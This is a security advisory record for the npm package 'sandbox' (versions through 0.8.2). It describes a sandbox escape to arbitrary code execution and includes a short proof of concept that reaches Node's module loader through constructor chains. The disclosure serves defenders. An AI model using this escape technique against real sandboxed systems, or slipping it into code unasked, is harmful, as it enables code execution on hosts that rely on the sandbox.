GHSA-fm4j-4xhm-xpwx

Source

https://github.com/advisories/GHSA-fm4j-4xhm-xpwx

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-fm4j-4xhm-xpwx/GHSA-fm4j-4xhm-xpwx.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-fm4j-4xhm-xpwx

Published

2020-09-02T15:51:34Z

Modified

2026-02-03T17:47:49.048558Z

Summary

Sandbox Breakout / Arbitrary Code Execution in sandbox

Details

All versions of sandbox through 0.8.2 are vulnerable to Sandbox Escape leading to Remote Code Execution. Due to insufficient input sanitization it is possible to escape the sandbox using constructors.

Proof of concept

var Sandbox = require("sandbox")
s = new Sandbox()
code = `new Function("return (this.constructor.constructor('return (this.process.mainModule.constructor._load)')())")()("util").inspect("hi")`
s.run(code)

Recommendation

No fix is currently available. Consider using an alternative module until a fix is made available.

Database specific

{
    "cwe_ids": [],
    "github_reviewed_at": "2020-08-31T18:34:58Z",
    "github_reviewed": true,
    "severity": "MODERATE",
    "nvd_published_at": null
}

References

Affected packages

npm / sandbox

Package

Name: sandbox; View open source insights on deps.dev
Purl: pkg:npm/sandbox

Affected ranges

Type: SEMVER
Events: Introduced

0.0.0

Database specific

last_known_affected_version_range

"< 1.0.0"

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-fm4j-4xhm-xpwx/GHSA-fm4j-4xhm-xpwx.json"